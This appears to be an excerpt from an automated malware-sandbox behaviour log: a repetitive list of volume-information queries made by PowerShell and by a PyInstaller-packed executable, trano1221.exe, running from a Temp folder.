Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\certifi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info\license_files VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\ucrtbase.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
